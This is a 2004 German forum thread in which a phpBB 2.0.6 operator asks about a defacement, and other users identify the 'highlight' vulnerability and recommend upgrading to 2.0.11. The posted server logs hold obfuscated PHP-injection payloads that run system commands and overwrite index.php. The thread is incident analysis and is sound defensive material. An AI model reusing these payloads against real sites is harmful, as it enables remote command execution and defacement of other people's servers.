sicherheits-lücke?

adino · Beitrag von **adino** » 01.12.2004 11:17

hallo,

wir hatten heute früh ein eigenartiges phänomen.

um 04:25 Uhr wurde eine index.php im hauptverzeichnis mit folgendem inhalt angelegt:

un-root crew ownz ur b0x

es war jedoch kein ftp-zugriff auf diesen host gelogt. also haben wir weitergesucht, und siehe da, die einzige aktivität um 04:25 war folgende:

Code: Alles auswählen

200.141.232.74 - - [01/Dec/2004:03:59:41 +0100] "GET /www/forum/viewtopic.php?t=2&highlight=%2527%252esystem(chr(105)%252echr(100))%252e%2527 HTTP/1.0" 200 20646 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
200.141.232.74 - - [01/Dec/2004:04:24:54 +0100] "GET /www/forum/viewtopic.php?t=2&highlight=%2527%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(85)%252echr(78)%252echr(95)%252echr(67)%252echr(79)%252echr(77)%252echr(69)%252echr(67)%252echr(79)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(85)%252echr(78)%252echr(95)%252echr(67)%252echr(79)%252echr(77)%252echr(69)%252echr(67)%252echr(79)%252echr(59)%252echr(117)%252echr(110)%252echr(97)%252echr(109)%252echr(101)%252echr(32)%252echr(45)%252echr(97)%252echr(59)%252echr(105)%252echr(100)%252echr(59)%252echr(112)%252echr(119)%252echr(100)%252echr(59)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(85)%252echr(78)%252echr(95)%252echr(70)%252echr(73)%252echr(77))%252e%2527 HTTP/1.0" 200 14520 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
200.141.232.74 - - [01/Dec/2004:04:24:56 +0100] "GET /www/forum/viewtopic.php?t=2&highlight=%2527%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(85)%252echr(78)%252echr(95)%252echr(67)%252echr(79)%252echr(77)%252echr(69)%252echr(67)%252echr(79)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(85)%252echr(78)%252echr(95)%252echr(67)%252echr(79)%252echr(77)%252echr(69)%252echr(67)%252echr(79)%252echr(59)%252echr(117)%252echr(110)%252echr(97)%252echr(109)%252echr(101)%252echr(32)%252echr(45)%252echr(97)%252echr(59)%252echr(105)%252echr(100)%252echr(59)%252echr(112)%252echr(119)%252echr(100)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(85)%252echr(78)%252echr(95)%252echr(70)%252echr(73)%252echr(77))%252e%2527 HTTP/1.0" 200 18508 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
200.141.232.74 - - [01/Dec/2004:04:25:29 +0100] "GET /www/forum/viewtopic.php?t=2&highlight=%2527%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(85)%252echr(78)%252echr(95)%252echr(67)%252echr(79)%252echr(77)%252echr(69)%252echr(67)%252echr(79)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(85)%252echr(78)%252echr(95)%252echr(67)%252echr(79)%252echr(77)%252echr(69)%252echr(67)%252echr(79)%252echr(59)%252echr(117)%252echr(110)%252echr(97)%252echr(109)%252echr(101)%252echr(32)%252echr(45)%252echr(97)%252echr(59)%252echr(105)%252echr(100)%252echr(59)%252echr(112)%252echr(119)%252echr(100)%252echr(59)%252echr(99)%252echr(100)%252echr(32)%252echr(46)%252echr(46)%252echr(59)%252echr(99)%252echr(100)%252echr(32)%252echr(46)%252echr(46)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(117)%252echr(110)%252echr(45)%252echr(114)%252echr(111)%252echr(111)%252echr(116)%252echr(32)%252echr(99)%252echr(114)%252echr(101)%252echr(119)%252echr(32)%252echr(111)%252echr(119)%252echr(110)%252echr(122)%252echr(32)%252echr(117)%252echr(114)%252echr(32)%252echr(98)%252echr(48)%252echr(120)%252echr(32)%252echr(32)%252echr(62)%252echr(32)%252echr(105)%252echr(110)%252echr(100)%252echr(101)%252echr(120)%252echr(46)%252echr(112)%252echr(104)%252echr(112)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(85)%252echr(78)%252echr(95)%252echr(70)%252echr(73)%252echr(77))%252e%2527 HTTP/1.0" 200 18508 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
200.141.232.74 - - [01/Dec/2004:04:25:33 +0100] "GET / HTTP/1.1" 200 37 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

200-147-100-160.tlm.dialuol.com.br - - [01/Dec/2004:04:40:12 +0100] "GET / HTTP/1.1" 200 37 "http://www.zone-h.org/defacements/onhold" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux)"
200-147-100-160.tlm.dialuol.com.br - - [01/Dec/2004:04:40:13 +0100] "GET / HTTP/1.1" 200 37 "http://www.zone-h.org/defacements/onhold" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux)"
200-147-100-160.tlm.dialuol.com.br - - [01/Dec/2004:04:40:15 +0100] "GET /favicon.ico HTTP/1.1" 404 1998 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux)"

(in einem text-editor ohne zeilenumbruch sieht das ganze etwas ordentlicher aus, hier http://member.ycn.com/~adino/log.txt ist`s im klar-text nochmals gespeichert)

ist etwas darüber bekannt?

forum-version ist 2.0.6, keine mods...

danke und schöne grüße - adino

Beitrag von **Dr.Death** » 01.12.2004 11:21

Das ist die "Highlight Sicherheitslücke".

Dadurch ist das Board angreifbar.

Du solltest umgehend auf Version 2.0.11 updaten!

Siehe dazu auch folgenden Link:

http://www.phpbb.de/viewtopic.php?t=70853

Doc.

marino · Beitrag von **marino** » 01.12.2004 11:21

http://www.phpbb.de/viewtopic.php?t=70839

zumindest den da verlinkten fix solltest mal einbauen

oder gleich auf 2.0.11 updaten

larsneo · Beitrag von **larsneo** » 01.12.2004 12:39

neben dem bereits angesprochenen highlight-exploit gibt es in früheren versionen einige weitere sicherheitsprobleme - bis hin zur anzeige des md5-hashes des admin-kennwortes.
merke: immer die aktuellste version einsetzen, in der 2.0.x reihe ist jedes update sicherheitsrelevant!